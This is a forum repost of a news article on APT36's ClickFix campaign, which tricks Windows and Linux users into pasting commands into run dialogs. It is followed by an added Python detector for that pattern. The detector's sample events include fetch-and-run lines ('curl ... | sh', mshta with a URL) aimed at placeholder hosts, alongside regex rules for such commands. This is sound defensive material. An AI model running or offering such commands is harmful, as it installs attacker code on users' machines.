<div id="post_message_791188">
A new campaign employing ClickFix attacks has been spotted targeting both Windows and Linux systems using instructions that make infections on either operating system possible.<br/> <br/> ClickFix is a <a href="https://www.bleepingcomputer.com/news/security/iclicker-hack-targeted-students-with-malware-via-fake-captcha/" target="_blank">social engineering tactic</a> where fake verification systems or application errors are used to trick website visitors into running console commands that install malware.<br/> <br/> These attacks have traditionally targeted Windows systems, prompting targets to execute PowerShell scripts from the Windows Run command, resulting in <a href="https://www.bleepingcomputer.com/news/security/over-6-000-wordpress-sites-hacked-to-install-plugins-pushing-infostealers/" target="_blank">info-stealer malware</a> infections and <a href="https://www.bleepingcomputer.com/news/security/interlock-ransomware-gang-pushes-fake-it-tools-in-clickfix-attacks/" target="_blank">even ransomware</a>.<br/> <br/> However, a 2024 campaign using bogus Google Meet errors also <a href="https://www.bleepingcomputer.com/news/security/fake-google-meet-conference-errors-push-infostealing-malware/" target="_blank">targeted macOS users</a>.<br/> <br/> <b><font size="4">ClickFix targeting Linux users</font></b><br/> <br/> A more recent campaign spotted by <a href="https://hunt.io/blog/apt36-clickfix-campaign-indian-ministry-of-defence" target="_blank">Hunt.io researchers</a> last week is among the first to adapt this social engineering technique for Linux systems.<br/> <br/> The attack, which is attributed to the Pakistan-linked threat group APT36 (aka "Transparent Tribe"), utilizes a website that impersonates India's Ministry of Defence with a link to an allegedly official press release.<br/> <br/> <img alt="" border="0" class="bbCodeImage" src="https://www.bleepstatic.com/images/news/u/1220909/2025/May/website.jpg"/><br/> <br/> When visitors click on this website link, 
they are profiled by the platform to determine their operating system, and then redirected to the matching attack flow.<br/> <br/> On Windows, victims are served a full-screen page warning them of limited content usage rights. Clicking 'Continue' triggers JavaScript that copies a malicious MSHTA command to the clipboard; the victim is then instructed to paste and execute it in the Windows terminal.<br/> <br/> This launches a .NET-based loader that connects to the attacker's address, while the user is shown a decoy PDF file so that everything appears legitimate and as expected.<br/> <br/> On Linux, victims are redirected to a CAPTCHA page that copies a shell command to their clipboard when they click the "I'm not a robot" button.<br/> <br/> The victim is then guided to press ALT+F2 to open a Linux run dialog, paste the command into it, and press <b>Enter</b> to execute it.<br/> <br/> <img alt="" border="0" class="bbCodeImage" src="https://www.bleepstatic.com/images/news/u/1220909/2025/May/linux-instructions.jpg"/><br/> <div style="margin:20px; margin-top:5px; "> <table border="0" cellpadding="6" cellspacing="0" width="100%"> <tr> <td class="alt2" style="background: rgb(37, 37, 37) none repeat scroll 0% 0%; border: 1px solid rgb(0, 0, 0); border-radius: 5px; font-size: 11px; text-shadow: none;"> Instructions for Linux users </td> </tr> </table> </div>The command drops the 'mapeal.sh' payload on the target's system, which, according to Hunt.io, performs no malicious actions in its current version and is limited to fetching a JPEG image from the attacker's server.<br/> <br/> <img alt="" border="0" class="bbCodeImage" src="https://www.bleepstatic.com/images/news/security/c/clickfix/linux/linux-clickfix.jpg"/><br/> <div style="margin:20px; margin-top:5px; "> <table border="0" cellpadding="6" cellspacing="0" width="100%"> <tr> <td
class="alt2" style="background: rgb(37, 37, 37) none repeat scroll 0% 0%; border: 1px solid rgb(0, 0, 0); border-radius: 5px; font-size: 11px; text-shadow: none;"> Linux ClickFix script </td> </tr> </table> </div>"The script downloads a JPEG image from the same trade4wealth[.]in directory and opens it in the background," explains Hunt.io.<br/> <br/> "No additional activity, such as persistence mechanisms, lateral movement, or outbound communication, was observed during execution."<br/> <br/> However, it is possible that APT36 is currently experimenting to determine the effectiveness of the Linux infection chain, as they would only need to swap out the image for a shell script to install malware or perform other malicious activity.<br/> <br/> The adaptation of ClickFix to carry out attacks on Linux is another testament to its effectiveness, as the attack type has now been used against all three major desktop OS platforms.<br/> <br/> As a general policy, users should not copy and paste any commands into Run dialogs without knowing exactly what the command does. Doing so only increases the risk of a malware infection and theft of sensitive data.<br/> <br/> <a href="https://www.bleepingcomputer.com/news/security/hackers-now-testing-clickfix-attacks-against-linux-targets/" target="_blank">@ BleepingComputer </a> </div>
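Added example, not code from the article or from Hunt.io: a small detector for the process pattern the post describes, a desktop run dialog (ALT+F2 on Linux, the Run box on Windows) spawning a shell or script host that fetches a remote payload, run over constructed process-creation events. The launcher process names, event field names and URLs are assumptions to be tuned to your own EDR or auditd schema.

```python
import re

# Assumed names of the desktop components that own the run dialog on each OS.
RUN_DIALOG_PARENTS = {
    "linux": {"gnome-shell", "krunner", "plasmashell", "xfce4-appfinder"},
    "windows": {"explorer.exe"},
}
# Linux: a curl/wget fetch piped into a shell, or a remote .sh script pulled down.
LINUX_FETCH = re.compile(r"\b(curl|wget)\b(?:[^|]*\|\s*(?:ba|z|da)?sh\b|.*\.sh\b)")
# Windows: script hosts handed a URL on the command line (the MSHTA case above).
WINDOWS_HOSTS = {"mshta.exe", "powershell.exe"}


def classify(event):
    """Return a finding for one process-creation event, or None if it looks benign."""
    os_name = event["os"]
    parent = event["parent_image"].lower()
    image = event["image"].lower()
    cmd = event["command_line"]
    if parent not in RUN_DIALOG_PARENTS[os_name]:
        return None  # only commands launched from a run dialog are in scope here
    if os_name == "linux":
        suspicious = LINUX_FETCH.search(cmd) is not None
    else:
        suspicious = image in WINDOWS_HOSTS and re.search(r"https?://", cmd, re.I) is not None
    if not suspicious:
        return None
    return {"host": event["host"], "rule": f"clickfix_{os_name}_run_dialog", "command_line": cmd}


def scan(events):
    """Run classify() over a list of events and return the findings."""
    return [f for f in map(classify, events) if f is not None]


# Constructed sample telemetry; the URLs are placeholders, not indicators from the article.
SAMPLE_EVENTS = [
    {"host": "ws-lin-01", "os": "linux", "parent_image": "gnome-shell", "image": "sh",
     "command_line": "sh -c 'curl -s http://example.invalid/mapeal.sh | sh'"},
    {"host": "ws-lin-02", "os": "linux", "parent_image": "gnome-shell", "image": "firefox",
     "command_line": "firefox https://example.org/"},
    {"host": "ws-lin-03", "os": "linux", "parent_image": "bash", "image": "curl",
     "command_line": "curl -O https://example.org/tool.sh"},  # from a terminal: out of scope
    {"host": "ws-win-01", "os": "windows", "parent_image": "explorer.exe", "image": "mshta.exe",
     "command_line": "mshta.exe http://example.invalid/document.hta"},
    {"host": "ws-win-02", "os": "windows", "parent_image": "explorer.exe", "image": "notepad.exe",
     "command_line": "notepad.exe C:\\Users\\a\\notes.txt"},
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding)
```

The parent-process check is the load-bearing part: the same curl-pipe-to-shell string typed in a terminal is common admin activity, so keying on the run dialog keeps the rule narrow.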